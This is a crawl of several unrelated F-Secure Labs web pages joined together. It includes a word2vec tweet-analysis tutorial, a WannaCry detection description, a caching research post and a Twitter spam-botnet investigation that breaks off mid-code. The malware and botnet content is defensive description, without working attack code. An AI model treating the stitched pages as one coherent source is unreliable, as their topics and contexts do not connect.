And now, back to the code. One of word2vec’s most interesting features is finding similarities between words. This is done via the word2vec.wv.most_similar() call. The following function calls word2vec.wv.most_similar() for a word and returns num_similar similar words. The returned value is a list containing the queried word, and a list of similar words ( [queried_word, [similar_word1, similar_word2, …]] ).

def most_similar(input_word, num_similar):
  sim = word2vec.wv.most_similar(input_word, topn=num_similar)
  output = []
  found = []
  for item in sim:
    w, n = item
    found.append(w)
  output = [input_word, found]
  return output

The following function takes a list of words to be queried, passes them to the above function, saves the output, and also passes the queried words to t_sne_scatterplot(), which we’ll show later. It also writes a csv file – associations.csv – which can be imported into Gephi to generate graphing visualizations. You can see some Gephi-generated visualizations in the accompanying blog post.

I find that manually viewing the word2vec_test.json file generated by this function is a good way to read the list of similarities found for each word queried with wv.most_similar().

def test_word2vec(test_words):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  output = []
  associations = {}
  test_items = test_words
  for count, word in enumerate(test_items):
    if word in vocab:
      print("[" + str(count+1) + "] Testing: " + word)
      if word not in associations:
        associations[word] = []
      similar = most_similar(word, num_similar)
      t_sne_scatterplot(word)
      output.append(similar)
      for s in similar[1]:
        if s not in associations[word]:
          associations[word].append(s)
    else:
      print("Word " + word + " not in vocab")
  filename = os.path.join(save_dir, "word2vec_test.json")
  save_json(output, filename)
  filename = os.path.join(save_dir, "associations.json")
  save_json(associations, filename)
  filename = os.path.join(save_dir, "associations.csv")
  handle = io.open(filename, "w", encoding="utf-8")
  handle.write(u"Source,Target\n")
  for w, sim in associations.iteritems():
    for s in sim:
      handle.write(w + u"," + s + u"\n")
  return output

The next function implements standalone code for creating a scatterplot from the output of T-SNE on a set of data points obtained from a word2vec.wv.most_similar() query. The scatterplot is visualized with matplotlib. Unfortunately, my matplotlib skills leave a lot to be desired, and these graphs don’t look great. But they’re readable.

def t_sne_scatterplot(word):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim0 = word2vec.wv[vocab[0]].shape[0]
  arr = np.empty((0, dim0), dtype='f')
  w_labels = [word]
  nearby = word2vec.wv.similar_by_word(word, topn=num_similar)
  arr = np.append(arr, np.array([word2vec[word]]), axis=0)
  for n in nearby:
    w_vec = word2vec[n[0]]
    w_labels.append(n[0])
    arr = np.append(arr, np.array([w_vec]), axis=0)

  tsne = TSNE(n_components=2, random_state=1)
  np.set_printoptions(suppress=True)
  Y = tsne.fit_transform(arr)
  x_coords = Y[:, 0]
  y_coords = Y[:, 1]

  plt.rc("font", size=16)
  plt.figure(figsize=(16, 12), dpi=80)
  plt.scatter(x_coords[0], y_coords[0], s=800, marker="o", color="blue")
  plt.scatter(x_coords[1:], y_coords[1:], s=200, marker="o", color="red")

  for label, x, y in zip(w_labels, x_coords, y_coords):
    plt.annotate(label.upper(), xy=(x, y), xytext=(0, 0), textcoords='offset points')
  plt.xlim(x_coords.min()-50, x_coords.max()+50)
  plt.ylim(y_coords.min()-50, y_coords.max()+50)
  filename = os.path.join(plot_dir, word + "_tsne.png")
  plt.savefig(filename)
  plt.close()

In order to create a scatterplot of the entire vocabulary, we need to perform T-SNE over that whole dataset. This can be a rather time-consuming operation. The next function performs that operation, attempting to save and re-load intermediate steps (since some of them can take over 30 minutes to complete).

def calculate_t_sne():
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  arr = np.empty((0, dim0), dtype='f')
  labels = []
  vectors_file = os.path.join(save_dir, "vocab_vectors.npy")
  labels_file = os.path.join(save_dir, "labels.json")
  if os.path.exists(vectors_file) and os.path.exists(labels_file):
    print("Loading pre-saved vectors from disk")
    arr = load_bin(vectors_file)
    labels = load_json(labels_file)
  else:
    print("Creating an array of vectors for each word in the vocab")
    for count, word in enumerate(vocab):
      if count % 50 == 0:
        print_progress(count, vocab_len)
      w_vec = word2vec[word]
      labels.append(word)
      arr = np.append(arr, np.array([w_vec]), axis=0)
    save_bin(arr, vectors_file)
    save_json(labels, labels_file)

  x_coords = None
  y_coords = None
  x_c_filename = os.path.join(save_dir, "x_coords.npy")
  y_c_filename = os.path.join(save_dir, "y_coords.npy")
  if os.path.exists(x_c_filename) and os.path.exists(y_c_filename):
    print("Reading pre-calculated coords from disk")
    x_coords = load_bin(x_c_filename)
    y_coords = load_bin(y_c_filename)
  else:
    print("Computing T-SNE for array of length: " + str(len(arr)))
    tsne = TSNE(n_components=2, random_state=1, verbose=1)
    np.set_printoptions(suppress=True)
    Y = tsne.fit_transform(arr)
    x_coords = Y[:, 0]
    y_coords = Y[:, 1]
    print("Saving coords.")
    save_bin(x_coords, x_c_filename)
    save_bin(y_coords, y_c_filename)
  return x_coords, y_coords, labels, arr

The next function takes the data calculated in the above step, and data obtained from test_word2vec(), and plots the results from each word queried on the scatterplot of the entire vocabulary. These plots are useful for visualizing which words are closer to others, and where clusters commonly pop up. This is the last function before we get onto the main routine.

def show_cluster_locations(results, labels, x_coords, y_coords):
  for item in results:
    name = item[0]
    print("Plotting graph for " + name)
    similar = item[1]
    in_set_x = []
    in_set_y = []
    out_set_x = []
    out_set_y = []
    name_x = 0
    name_y = 0
    for count, word in enumerate(labels):
      xc = x_coords[count]
      yc = y_coords[count]
      if word == name:
        name_x = xc
        name_y = yc
      elif word in similar:
        in_set_x.append(xc)
        in_set_y.append(yc)
      else:
        out_set_x.append(xc)
        out_set_y.append(yc)
    plt.figure(figsize=(16, 12), dpi=80)
    plt.scatter(name_x, name_y, s=400, marker="o", c="blue")
    plt.scatter(in_set_x, in_set_y, s=80, marker="o", c="red")
    plt.scatter(out_set_x, out_set_y, s=8, marker=".", c="black")
    filename = os.path.join(big_plot_dir, name + "_tsne.png")
    plt.savefig(filename)
    plt.close()

Now let’s write our main routine, which will call all the above functions, process our collected Twitter data, and generate visualizations. The first few lines take care of our three preprocessing steps, and generation of a frequency distribution / vocabulary. The script expects the raw Twitter data to reside in a relative path (data/tweets.txt). Change those variables as needed. Also, all output is saved to a subdirectory in the relative path (analysis/). Again, tailor this to your needs.

if __name__ == '__main__':
  input_dir = "data"
  save_dir = "analysis"
  if not os.path.exists(save_dir):
    os.makedirs(save_dir)

  print("Preprocessing raw data")
  raw_input_file = os.path.join(input_dir, "tweets.txt")
  filename = os.path.join(save_dir, "data.json")
  processed = try_load_or_process(filename, process_raw_data, raw_input_file)
  print("Unique sentences: " + str(len(processed)))

  print("Tokenizing sentences")
  filename = os.path.join(save_dir, "tokens.json")
  tokens = try_load_or_process(filename, tokenize_sentences, processed)

  print("Cleaning tokens")
  filename = os.path.join(save_dir, "cleaned.json")
  cleaned = try_load_or_process(filename, clean_sentences, tokens)

  print("Getting word frequencies")
  filename = os.path.join(save_dir, "frequencies.json")
  frequencies = try_load_or_process(filename, get_word_frequencies, cleaned)
  vocab_size = len(frequencies)
  print("Unique words: " + str(vocab_size))

Next, I trim the vocabulary, and save the resulting list of words. This allows me to look over the trimmed list and ensure that the words I’m interested in survived the trimming operation. Due to the nature of the Finnish language, (and Twitter), the vocabulary of our “cleaned” set, prior to trimming, was over 100,000 unique words. After trimming it ended up at around 11,000 words.

  trimmed_vocab = []
  min_frequency_val = 6
  for item in frequencies:
    if item[1] >= min_frequency_val:
      trimmed_vocab.append(item[0])
  trimmed_vocab_size = len(trimmed_vocab)
  print("Trimmed vocab length: " + str(trimmed_vocab_size))
  filename = os.path.join(save_dir, "trimmed_vocab.json")
  save_json(trimmed_vocab, filename)

The next few lines do all the compute-intensive work. We’ll create a word2vec model with the cleaned token set, create tensorboard embeddings (for the visualizations mentioned above), and calculate T-SNE. Yes, this part can take a while to run, so go put the kettle on.

  print
  print("Instantiating word2vec model")
  word2vec = get_word2vec(cleaned)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  print("word2vec vocab contains " + str(vocab_len) + " items.")
  dim0 = word2vec.wv[vocab[0]].shape[0]
  print("word2vec items have " + str(dim0) + " features.")

  print("Creating tensorboard embeddings")
  create_embeddings(word2vec)

  print("Calculating T-SNE for word2vec model")
  x_coords, y_coords, labels, arr = calculate_t_sne()

Finally, we’ll take the top 50 most frequent words from our frequency distribution, query each of them for their 40 most similar words, and plot both labelled graphs of each set, and a “big plot” of that set over the entire vocabulary.

  plot_dir = os.path.join(save_dir, "plots")
  if not os.path.exists(plot_dir):
    os.makedirs(plot_dir)

  num_similar = 40
  test_words = []
  for item in frequencies[:50]:
    test_words.append(item[0])
  results = test_word2vec(test_words)

  big_plot_dir = os.path.join(save_dir, "big_plots")
  if not os.path.exists(big_plot_dir):
    os.makedirs(big_plot_dir)
  show_cluster_locations(results, labels, x_coords, y_coords)

And that’s it! Rather a lot of code, but it does quite a few useful tasks. If you’re interested in seeing the visualizations I created using this tool against the Tweets collected from the January 2018 Finnish presidential elections, check out this blog post.



NLP Analysis And Visualizations Of #presidentinvaalit2018

During the lead-up to the January 2018 Finnish presidential elections, I collected a dataset consisting of raw Tweets gathered from search words related to the election. I then performed a series of natural language processing experiments on this raw data. The methodology, including all the code used, can be found in an accompanying blog post. […]

2018-01-30

How To Get Tweets From A Twitter Account Using Python And Tweepy

In this blog post, I’ll explain how to obtain data from a specified Twitter account using tweepy and Python. Let’s jump straight into the code! As usual, we’ll start off by importing dependencies. I’ll use the datetime and Counter modules later on to do some simple analysis tasks. from tweepy import OAuthHandler from tweepy import […]

2018-01-26

How To Get Streaming Data From Twitter

I occasionally receive requests to share my Twitter analysis tools. After a few recent requests, it finally occurred to me that it would make sense to create a series of articles that describe how to use Python and the Twitter API to perform basic analytical tasks. Teach a man to fish, and all that. In […]

2018-01-17

Further Analysis Of The Finnish Themed Twitter Botnet

In a blog post I published yesterday, I detailed the methodology I have been using to discover “Finnish themed” Twitter accounts that are most likely being programmatically created. In my previous post, I called them “bots”, but for the sake of clarity, let’s refer to them as “suspicious accounts”. These suspicious accounts all follow a […]

2018-01-12

Someone Is Building A Finnish-Themed Twitter Botnet

Finland will hold a presidential election on the 28th January 2018. Campaigning just started, and candidates are being regularly interviewed by the press and on the TV. In a recent interview, one of the presidential candidates, Pekka Haavisto, mentioned that both his Twitter account, and the account of the current Finnish president, Sauli Niinistö had […]

2018-01-11

Some Notes On Meltdown And Spectre

The recently disclosed Meltdown and Spectre vulnerabilities can be viewed as privilege escalation attacks that allow an attacker to read data from memory locations that aren’t meant to be accessible. Neither of these vulnerabilities allow for code execution. However, exploits based on these vulnerabilities could allow an adversary to obtain sensitive information from memory (such […]

2018-01-09

Don’t Let An Auto-Elevating Bot Spoil Your Christmas

Ho ho ho! Christmas is coming, and for many people it’s time to do some online shopping. Authors of banking Trojans are well aware of this yearly phenomenon, so it shouldn’t come as a surprise that some of them have been hard at work preparing some nasty surprises for this shopping season. And that’s exactly […]

2017-12-18

Necurs’ Business Is Booming In A New Partnership With Scarab Ransomware

Necurs’ spam botnet business is doing well as it is seemingly acquiring new customers. The Necurs botnet is the biggest deliverer of spam with 5 to 6 million infected hosts online monthly, and is responsible for the biggest single malware spam campaigns. Its service model provides the whole infection chain: from spam emails with malicious […]

2017-11-23

RickRolled by none other than IoTReaper

IoT_Reaper overview IoT_Reaper, or the Reaper in short, is a Linux bot targeting embedded devices like webcams and home router boxes. Reaper is somewhat loosely based on the Mirai source code, but instead of using a set of admin credentials, the Reaper tries to exploit device HTTP control interfaces. It uses a range of vulnerabilities […]

2017-11-03

Facebook Phishing Targeted iOS and Android Users from Germany, Sweden and Finland

Two weeks ago, a co-worker received a message in Facebook Messenger from his friend. Based on the message, it seemed that the sender was telling the recipient that he was part of a video in order to lure him into clicking it. The shortened link was initially redirecting to Youtube.com, but was later on changed […]

2017-10-30
#####EOF##### F-Secure Labs | Home

Combining knowledge and technology

Learn more

From the Labs

Thoughts and views on the latest technology and security news

Submit A Sample

Send us a file or URL you think is harmful, or incorrectly detected

Submit a Sample

Report a Vulnerability

Take part in our bug bounty program

Submit a Report

Threat Descriptions

Information about recently published detections

Trojan:W32/Rabbad

This crypto-ransomware first came to public notice on 24 October 2017 following reports that it had infected organizations in Ukraine and Russia.

Application.BitCoinMiner.SX

Application.BitCoinMiner is a program that uses the computer's physical resources (memory, processing power, etc) to generate units of a virtual or digital cryptocurrency.

Trojan.PRForm.A

This detection identifies compromised installers for the CCleaner utility program, which have been altered to include a backdoor that silently runs in the background when the affected installer is launched.

Latest Whitepapers

The State of Cyber Security 2017

Published Feb 2017

Observations and insights to help users and businesses keep pace with a rapidly evolving threat landscape.

Read more (PDF)

Callisto Group

Published Apr 2017

The Callisto Group threat actor's primary interest is gathering foreign and security policy intelligence.

Read more (PDF)

Ransomware

How to prevent, predict, detect & respond

Published Apr 2017

Ransomware is one of the most prominent cyber threats today. Yet just like any other threat...

Read more (PDF)

Videos

Lab-related videos on F-Secure's YouTube channels

F-Secure State of Cyber Security 2017 - Beyond the Nation State
F-Secure State of Cyber Security 2017 - The Insecure Home Security System
How Can You Keep Your Data From Your ISP?
#####EOF##### Andy Patel | News from the Lab
About

Andy Patel


Researcher, Artificial Intelligence Center of Excellence.
Twitter: @r0zetta

Latest articles from

Andy Patel

#####EOF##### Video: Creating Graph Visualizations With Gephi | News from the Lab

Video: Creating Graph Visualizations With Gephi

I wanted to create a how-to blog post about creating Gephi visualizations, but I realized it’d probably need to include, like, a thousand embedded screenshots. So I made a video instead.



Articles with similar Tags
#####EOF##### realtime-spy | News from the Lab
Articles with the Tag

#realtime-spy

#####EOF##### Social Networks | News from the Lab
Articles with the Tag

#social-networks

#####EOF##### surveillance | News from the Lab
Articles with the Tag

#surveillance

#####EOF##### Improving Caching Strategies With SSICLOPS | News from the Lab

Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years as a joint collaboration between ten industrial and academic partners. Here’s the official description of the project:

The Scalable and Secure Infrastructures for Cloud Operations (SSICLOPS, pronounced “cyclops”) project focuses on techniques for the management of federated cloud infrastructures, in particular cloud networking techniques within software-defined data centres and across wide-area networks. SSICLOPS is funded by the European Commission under the Horizon2020 programme (https://ssiclops.eu/). The project brings together industrial and academic partners from Finland, Germany, Italy, the Netherlands, Poland, Romania, Switzerland, and the UK.

The primary goal of the SSICLOPS project is to empower enterprises to create and operate high-performance private cloud infrastructure that allows flexible scaling through federation with other clouds, without compromising their service level and security requirements. SSICLOPS federation supports the efficient integration of clouds, no matter whether they are geographically collocated or spread out, or belong to the same or different administrative entities or jurisdictions: in all cases, SSICLOPS delivers maximum performance for inter-cloud communication, enforces legal and security constraints, and minimizes overall resource consumption. In such a federation, individual enterprises will be able to dynamically scale their cloud services in and out: they dynamically offer their own spare resources (when available) and take in resources from others when needed. This allows each federation member to maximize its own infrastructure utilization while minimizing its excess capacity needs.

Many of our systems (both backend and on endpoints) rely on the ability to quickly query the reputation and metadata of objects from a centrally maintained repository. Reputation queries of this type are served either directly from the central repository, or through one of many geographically distributed proxy nodes. When a query is made to a proxy node, if the required verdicts don’t exist in that proxy’s cache, the proxy queries the central repository, and then delivers the result. Since reputation queries need to be low-latency, the additional hop from proxy to central repository slows down response times.

In the scope of the SSICLOPS project, we evaluated a number of potential improvements to this content distribution network. Our aim was to reduce the number of queries from proxy nodes to the central repository, by improving caching mechanisms for use cases where the set of the most frequently accessed items is highly dynamic. We also looked into improving the speed of communications between nodes via protocol adjustments. Most of this work was done in cooperation with Deutsche Telekom and Aalto University.

The original implementation of our proxy nodes used a Least Recently Used (LRU) caching mechanism to determine which cached items should be discarded. Since our reputation verdicts have time-to-live values associated with them, these values were also taken into account in our original algorithm.
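Conceptually, a TTL-aware LRU cache of this kind can be sketched as follows. This is an illustrative sketch only, not F-Secure's production code; the class and method names are hypothetical:

```python
import time
from collections import OrderedDict

class TTLLRUCache:
    """LRU cache that also discards entries whose time-to-live has expired."""

    def __init__(self, capacity):
        self.capacity = capacity
        self.items = OrderedDict()  # key -> (value, expiry timestamp)

    def get(self, key, now=None):
        now = time.time() if now is None else now
        if key not in self.items:
            return None
        value, expiry = self.items[key]
        if expiry <= now:            # TTL elapsed: treat as a miss
            del self.items[key]
            return None
        self.items.move_to_end(key)  # mark as most recently used
        return value

    def put(self, key, value, ttl, now=None):
        now = time.time() if now is None else now
        self.items[key] = (value, now + ttl)
        self.items.move_to_end(key)
        if len(self.items) > self.capacity:
            self.items.popitem(last=False)  # evict the least recently used
```

An expired entry is treated as a cache miss even if it would otherwise be the most recently used item, which is the reason TTLs had to be folded into the eviction logic.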

Hit Rate Results

Initial tests performed in October 2017 indicated that SG-LRU outperformed LRU on our dataset

During the project, we worked with Gerhard Hasslinger’s team at Deutsche Telekom to evaluate whether alternate caching strategies might improve the performance of our reputation lookup service. We found that Score-Gated LRU / Least Frequently Used (LFU) strategies outperformed our original LRU implementation. Based on the conclusions of this research, we have decided to implement a windowed LFU caching strategy, with some limited “predictive” features for determining which items might be queried in the future. The results look promising, and we’re planning on bringing the new mechanism into our production proxy nodes in the near future.
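The windowed-LFU idea can be sketched roughly like this: request frequencies are counted over a sliding window of recent lookups, and the cached item with the lowest in-window frequency is evicted first. This is an illustrative sketch with hypothetical names, not the production algorithm (which also includes the predictive features mentioned above):

```python
from collections import Counter, deque

class WindowedLFUCache:
    """Evicts the key least frequently requested within a recent-request window."""

    def __init__(self, capacity, window_size):
        self.capacity = capacity
        self.window = deque(maxlen=window_size)  # recent request history
        self.freq = Counter()                    # frequencies within the window
        self.store = {}

    def _record(self, key):
        if len(self.window) == self.window.maxlen:
            oldest = self.window[0]
            self.freq[oldest] -= 1   # slide the window forward
        self.window.append(key)
        self.freq[key] += 1

    def get(self, key):
        self._record(key)
        return self.store.get(key)

    def put(self, key, value):
        self._record(key)
        if key not in self.store and len(self.store) >= self.capacity:
            # evict the cached key with the lowest in-window frequency
            victim = min(self.store, key=lambda k: self.freq[k])
            del self.store[victim]
        self.store[key] = value
```

Because only recent requests count toward frequency, the cache adapts when the set of hot items changes, which is the property that matters when the most frequently accessed items are highly dynamic.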


SG-LRU exploits the focus on top-k requests by keeping most top-k objects in the cache

The work done in SSICLOPS will serve as a foundation for the future optimization of content distribution strategies in many of F-Secure’s services, and we’d like to thank everyone who worked with us on this successful project!



#####EOF##### Twitter | News from the Lab
Articles with the Tag

#twitter

#####EOF##### Sami Ruohonen | News from the Lab
About

Sami Ruohonen


Threat Researcher at F-Secure

Latest articles from

Sami Ruohonen

#####EOF##### Eternalblue | News from the Lab
Articles with the Tag

#eternalblue-2

#####EOF##### Trojan.Ransom.WannaCryptor Description | F-Secure Labs

Trojan.Ransom.WannaCryptor

Classification

Malware

Trojan

W32

WCryr,WannaCry.[variant],Wanna Decryptor,Trojan:W32/WannaCry.[variant],Trojan.Ransom.WannaCryptor.[variant],Win32.Trojan-Ransom.WannaCry.[variant],Trojan:W32/WannaCryptor.[variant]!Deepguard

Summary

Trojan.Ransom.WannaCryptor identifies the WannaCry ransomware, which encrypts the affected device and demands payment of a ransom to restore normal use.

WannaCry is also known as Wanna Decryptor and WCryr.

Detections

F-Secure security products detect all known variants of this threat with a combination of generic detections and family-specific detections, including (but not limited to):

  • Trojan.Ransom.WannaCryptor.H
  • Trojan:W32/WannaCryptor.A!Deepguard
  • Gen:Variant.Ransom.WannaCryptor.1
  • Gen:Trojan.Heur.RP.JtW@aePsbmpi
  • Suspicious:W32/Malware.51e4307093!Online

Please ensure your F-Secure security product is up-to-date with the latest detection database updates and has Deepguard turned on for maximum coverage.

Removal

Automatic action

Depending on the settings of your F-Secure security product, it will either move the file to quarantine, where it cannot spread or cause harm, or remove it.

Exploit prevention

The WannaCry ransomware attack uses known vulnerabilities in the Windows operating system to spread and infect machines. Microsoft has already released a fix for this issue in its March 2017 Security Bulletin. It is strongly recommended that users and administrators ensure that all their systems have received the patch.

Users on systems such as Windows XP that no longer have mainstream support should refer to Microsoft's blog post, which offers more details of the emergency security patches released in response to this issue.

Find out more

Knowledge Base

Find the latest advice in our Community Knowledge Base.

User Guide

See the user guide for your product on the Help Center.

Contact Support

Chat with or call an expert for help.

Submit a sample

Submit a file or URL for further analysis.

Technical Details

WannaCry came to public notice in a major outbreak that was first reported on Friday, 13 May 2017.

Infection

The WannaCry ransomware is spread by a dropper component that exploits known vulnerabilities in Windows to drop the ransomware binary onto a vulnerable machine. If the dropper is successful in exploiting an Internet-facing machine, it can also use vulnerabilities in Windows SMB Server to infect other computers on the same local area network.

As part of its attack, the WannaCry dropper component uses an exploit known as EternalBlue, which was first publicized in the data allegedly stolen from the US's National Security Agency (NSA) and released by hacking group The Shadow Brokers.

The vulnerabilities used to spread WannaCry were fixed by Microsoft in March 2017 with the MS17-010 patch; however, systems that have not yet received the fix remain vulnerable. It is strongly recommended that users and administrators ensure that all their systems have received the MS17-010 patch to prevent the WannaCry ransomware from gaining entry to their machines.

Encryption

The WannaCry ransomware encrypts all files stored on the affected machine. The encryption uses the AES-128 encryption algorithm, which is extremely difficult to break.

It encrypts the following file types: .doc, .docx, .docb, .docm, .dot, .dotm, .dotx, .xls, .xlsx, .xlsm, .xlsb, .xlw, .xlt, .xlm, .xlc, .xltx, .xltm, .ppt, .pptx, .pptm, .pot, .pps, .ppsm, .ppsx, .ppam, .potx, .potm, .pst, .ost, .msg, .eml, .edb, .vsd, .vsdx, .txt, .csv, .rtf, .123, .wks, .wk1, .pdf, .dwg, .onetoc2, .snt, .hwp, .602, .sxi, .sti, .sldx, .sldm, .sldm, .vdi, .vmdk, .vmx, .gpg, .aes, .ARC, .PAQ, .bz2, .tbk, .bak, .tar, .tgz, .gz, .7z, .rar, .zip, .backup, .iso, .vcd, .jpeg, .jpg, .bmp, .png, .gif, .raw, .cgm, .tif, .tiff, .nef, .psd, .ai, .svg, .djvu, .m4u, .m3u, .mid, .wma, .flv, .3g2, .mkv, .3gp, .mp4, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .mp3, .sh, .class, .jar, .java, .rb, .asp, .php, .jsp, .brd, .sch, .dch, .dip, .pl, .vb, .vbs, .ps1, .bat, .cmd, .js, .asm, .h, .pas, .cpp, .c, .cs, .suo, .sln, .ldf, .mdf, .ibd, .myi, .myd, .frm, .odb, .dbf, .db, .mdb, .accdb, .sql, .sqlitedb, .sqlite3, .asc, .lay6, .lay, .mml, .sxm, .otg, .odg, .uop, .std, .sxd, .otp, .odp, .wb2, .slk, .dif, .stc, .sxc, .ots, .ods, .3dm, .max, .3ds, .uot, .stw, .sxw, .ott, .odt, .pem, .p12, .csr, .crt, .key, .pfx, .der

Ransom demand

Once the files have been encrypted, WannaCry displays a ransom demand for up to $300 in Bitcoin. A video and screenshots of the ransomware in action can be seen on F-Secure's Safe and Savvy blog.

Date Created: 13-May-2017 02:00:00 UTC

Date Last Modified: 15-May-2017 02:20:00 UTC

#####EOF##### Cyber security and online security articles, news and research - F-Secure Blog

Trending Themes

Data Breaches 101

What are data breaches? What to do if your account has been involved in one? These articles answer those questions and more.

Making Attackers Unhappy Since 1988

The history of F-Secure is the history of our fellows, and here we are.

Cyber Security Crash Course

Get a quick overview to incident detection and response. Increase your organization’s security awareness with the video series.


#####EOF##### Pr0nbots2: Revenge Of The Pr0nbots | News from the Lab

Pr0nbots2: Revenge Of The Pr0nbots

A month and a half ago I posted an article in which I uncovered a series of Twitter accounts advertising adult dating (read: scam) websites. If you haven’t read it yet, I recommend taking a look at it before reading this article, since I’ll refer back to it occasionally.

To start with, let’s recap. In my previous research, I used a script to recursively query Twitter accounts for specific patterns, and found just over 22,000 Twitter bots using this process. That figure stood when I concluded my research (stopped my script), at which point I had queried only 3000 of the 22,000 discovered accounts. I suspect my script would have uncovered a lot more accounts had I let it run longer.

This week, I decided to re-query all the Twitter IDs I found in March, to see if anything had changed. To my surprise, I was only able to query 2895 of the original 21964 accounts, indicating that Twitter has taken action on most of those accounts.

In order to find out whether the culled accounts were deleted or suspended, I wrote a small Python script that used the requests module to directly query each account’s URL. A 404 error indicated that the account was removed or renamed; any other reply indicated that the account was suspended. Of the 19069 culled accounts checked, 18932 were suspended, and 137 were deleted/renamed.
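A minimal version of that check might look like the following. This is an illustrative sketch: the classification logic separates cleanly from the network call, and the exact markers used to detect a suspended profile are assumptions, not the script's actual strings:

```python
import requests

def classify_account(status_code, final_url, body):
    """Classify a Twitter profile from the response to a direct page request:
    a 404 means the account was removed or renamed; a reply mentioning the
    suspended page means the account was suspended; anything else is live."""
    if status_code == 404:
        return "deleted_or_renamed"
    if "suspended" in final_url or "suspended" in body:
        return "suspended"
    return "active"

def account_status(screen_name):
    """Fetch https://twitter.com/<screen_name> and classify the account."""
    resp = requests.get("https://twitter.com/" + screen_name,
                        allow_redirects=True)
    return classify_account(resp.status_code, resp.url, resp.text)
```

Keeping `classify_account` as a pure function makes it easy to test the logic without touching the network.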

I also checked the surviving accounts in a similar manner, using requests to identify which ones were “restricted” (by checking for specific strings in the HTML returned from the query). Of the 2895 surviving accounts, 47 were restricted and the other 2848 were not.

As noted in my previous article, the accounts identified during my research had creation dates ranging from a few days old to over a decade in age. I checked the creation dates of both the culled set and the survivors’ set (using my previously recorded data) for patterns, but I couldn’t find any. Here they are, for reference:

Based on the connectivity I recorded between the original bot accounts, I’ve created a new graph visualization depicting the surviving communities. Of the 2895 survivors, only 402 presumably still belong to the communities I observed back then. The rest of the accounts were likely orphaned. Here’s a representation of what the surviving communities might look like, if the entity controlling these accounts didn’t make any changes in the meantime.

By the way, I’m using Gephi to create these graph visualizations, in case you were wondering.

Erik Ellason (@slickrockweb) contacted me recently with some evidence that the bots I’d discovered might be re-tooling. He pointed me to a handful of accounts that contained the shortened URL in a pinned tweet (instead of in the account’s description). Here’s an example profile:

Fetching a user object using the Twitter API will also return the last tweet that account published, but I’m not sure it would necessarily return the pinned Tweet. In fact, I don’t think there’s a way of identifying a pinned Tweet using the standard API. Hence, searching for these accounts by their promotional URL would be time consuming and problematic (you’d have to iterate through their tweets).

Fortunately, automating discovery of Twitter profiles similar to those Erik showed me was fairly straightforward. Like the previous botnet, the accounts could be crawled because they follow each other. Also, all of these new accounts had description text that followed a predictable pattern. Here’s an example of a few of those sentences:

look url in last post
go on link in top tweet
go at site in last post

It was trivial to construct a simple regular expression to find all such sentences:

desc_regex = "(look|go on|go at|see|check|click) (url|link|site) in (top|last) (tweet|post)"
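As a quick sanity check (the bot-like sentences are the examples from above; this snippet is illustrative), the pattern matches all three while leaving an ordinary bio untouched:

```python
import re

desc_regex = r"(look|go on|go at|see|check|click) (url|link|site) in (top|last) (tweet|post)"

descriptions = [
    "look url in last post",
    "go on link in top tweet",
    "go at site in last post",
    "just a normal bio",
]

# Only the bot-like descriptions match the pattern
matches = [d for d in descriptions if re.search(desc_regex, d)]
```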

I modified my previous script to include the above regular expression, seeded it with the handful of accounts that Erik had provided me, and let it run. After 24 hours, my new script had identified just over 20,000 accounts. Mapping the follower/following relationships between these accounts gave me the following graph:

As we zoom in, you’ll notice that these accounts are way more connected than the older botnet. The 20,000 or so accounts identified at this point map to just over 100 separate communities. With roughly the same amount of accounts, the previous botnet contained over 1000 communities.

Zooming in further shows the presence of “hubs” in each community, similar to those in the previous botnet.

Given that this botnet showed a greater degree of connectivity than the previous one studied, I decided to continue my discovery script and collect more data. The discovery rate of new accounts slowed slightly after the first 24 hours, but remained steady for the rest of the time it was running. After 4 days, my script had found close to 44,000 accounts.

And eight days later, the total was just over 80,000.

Here’s another way of visualizing that data:


Here’s the size distribution of communities detected for the 80,000 node graph. Smaller community sizes may indicate places where my discovery script didn’t yet look. The largest communities contained over 1000 accounts. There may be a way of searching more efficiently for these accounts by prioritizing crawling within smaller communities, but this is something I’ve yet to explore.

I shut down my discovery script at this point, having queried just over 30,000 accounts. I’m fairly confident this rabbit hole goes a lot deeper, but it would have taken weeks to query the next 50,000 accounts, not to mention the countless more that would have been added to the list during that time.

As with the previous botnet, the creation dates of these accounts spanned over a decade.

Here’s the oldest account I found.

Using the same methodology I used to analyze the survivor accounts from the old botnet, I checked which of these new accounts were restricted by Twitter. There was an almost exactly even split between restricted and non-restricted accounts in this new set.

Given that these new bots show many similarities to the previously discovered botnet (similar avatar pictures, same URL shortening services, similar usage of the English language) we might speculate that this new set of accounts is being managed by the same entity as those older ones. If this is the case, a further hypothesis is that said entity is re-tooling based on Twitter’s action against their previous botnet (for instance, to evade automation).

Because these new accounts use a pinned Tweet to advertise their services, we can test this hypothesis by examining the creation dates of the most recent Tweet from each account. If the entity is indeed re-tooling, all of the accounts should have Tweeted fairly recently. However, a brief examination of last tweet dates for these accounts revealed a rather large distribution, tracing back as far as 2012. The distribution had a long tail, with a majority of the most recent Tweets having been published within the last year. Here’s the last year’s worth of data graphed.

Here’s the oldest Tweet I found:

This data, on its own, would refute the theory that the owner of this botnet has been recently retooling. However, a closer look at some of the discovered accounts reveals an interesting story. Here are a few examples.

This account took a 6 year break from Twitter, and switched language to English.

This account mentions a “url in last post” in its bio, but there isn’t one.

This account went from posting in Korean to posting in English, with a 3 year break in between. However, the newer Tweet mentions “url in bio”. Sounds vaguely familiar.

Examining the text contained in the last Tweets from these discovered accounts revealed around 76,000 unique Tweets. Searching these Tweets for links containing the URL shortening services used by the previous botnet revealed 8,200 unique Tweets. Here’s a graph of the creation dates of those particular Tweets.
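The filtering step described above can be sketched as follows; the shortener domains and tweet texts here are illustrative placeholders, not the actual data from the investigation:

```python
from urllib.parse import urlparse

# Hypothetical set of URL shortening domains seen in the earlier botnet
SHORTENER_DOMAINS = {"goo.gl", "bit.ly", "tinyurl.com"}

def uses_shortener(tweet_text):
    """Return True if the tweet text links to a known shortener domain."""
    for word in tweet_text.split():
        if word.startswith("http"):
            host = urlparse(word).netloc.lower()
            if host in SHORTENER_DOMAINS:
                return True
    return False

tweets = [
    "url in bio https://goo.gl/abc123",
    "hello world https://example.com/page",
]
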